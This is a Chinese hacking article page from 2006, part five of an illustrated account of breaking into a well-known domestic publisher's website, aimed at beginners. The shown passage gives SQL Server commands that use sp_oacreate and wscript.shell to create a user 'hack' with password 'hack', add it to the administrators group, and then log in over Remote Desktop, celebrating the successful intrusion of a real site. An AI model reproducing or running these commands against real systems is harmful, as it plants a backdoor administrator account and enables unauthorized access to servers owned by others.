首 页文章中心下载中心繁體中文
设为首页
加入收藏
联系我们
您当前的位置:开源盛世-源代码下载网 -> 文章中心 -> 网络安全 -> 攻防技术 -> 文章内容 退出登录 用户管理
栏目导航
· 安全资讯 · 攻防技术
· 服务器类
热门文章
· Tab Control控件使用...
· 学生档案管理系统
· [图文] 排列组合公式
· UTF-8与GB2312之间的...
· DirectShow下载安装...
· Virtual PC 在PAE模...
· Windows2000终端服务...
· MapInfo上的GIS系统...
· Mapbasic参考手册索...
· MapX应用开发中文讲...
相关文章
· 图解:入侵国内某知...
· 图解:入侵国内某知...
· 图解:入侵国内某知...
· 图解:入侵国内某知...
图解:入侵国内某知名出版社网站全记录(五)
作者:小鱼修炼  来源:邪恶八进制信息安全团队  发布时间:2006-3-20 19:55:00  发布人:Polaris

减小字体 增大字体

  晕,xplog70.dll被删了,可恶,既然开了3389只要加个用户就可以了,加用户也不一定要用XP_cmdshell,可以试试别的转储过程,打开"SQL查询分析器分离版本"输入IP和密码点连接,图19

  OK,我们在“查询”中输入:

------------------------------------------------
declare @cmd INT
exec sp_oacreate 'wscript.shell',@cmd output
exec sp_oamethod @cmd,'run',null,'net user hack hack /add','0','true'
-----------------------------------------------
declare @cmd INT
exec sp_oacreate 'wscript.shell',@cmd output
exec sp_oamethod @cmd,'run',null,'net localgroup administrators hack /add','0','true'
--------------------------------------------------
  这个就是增加一个hack的用户密码也是hack,再提升为管理员权限,图20

  怎么样?是不是条条大路通罗马?

  用增加的用户登陆3389看看(图21)

  哈哈,成功!任务完成!^_^

  四.小结

  由于篇幅问题还有很多入侵的过程没有写出来,这里写的是主要的入侵过程了,文章读起来很简单(我在实际中可是遇到很多问题),但要是你实际操作起来可能就会遇到很多问题了,想告诉广大菜鸟朋友:真正的技术是实践出来的不是看出来的。这里不仅给大家展示的是一次入侵过程更想把入侵中分析问题的思想传达给各位菜鸟朋友们,由于我水平有限可能文章有很多不足之处,所以还请各位见笑了!

End of《图解:入侵国内某知名出版社网站全记录(五)》

[] [返回上一页] [打 印] [收 藏]
 
∷相关“图解:入侵国内某知名出版社网站全记录(五)”文章评论∷
(评论内容只代表网友观点,与本站立场无关!) [更多评论...]
关于本站 - 网站帮助 - 广告合作 - 下载声明 - 友情连接 - 网站地图 网站目录 鄂ICP备06007162
开源盛世 版权所有Copyright © 2003-2005 VSCodes.Com. All Rights Reserved.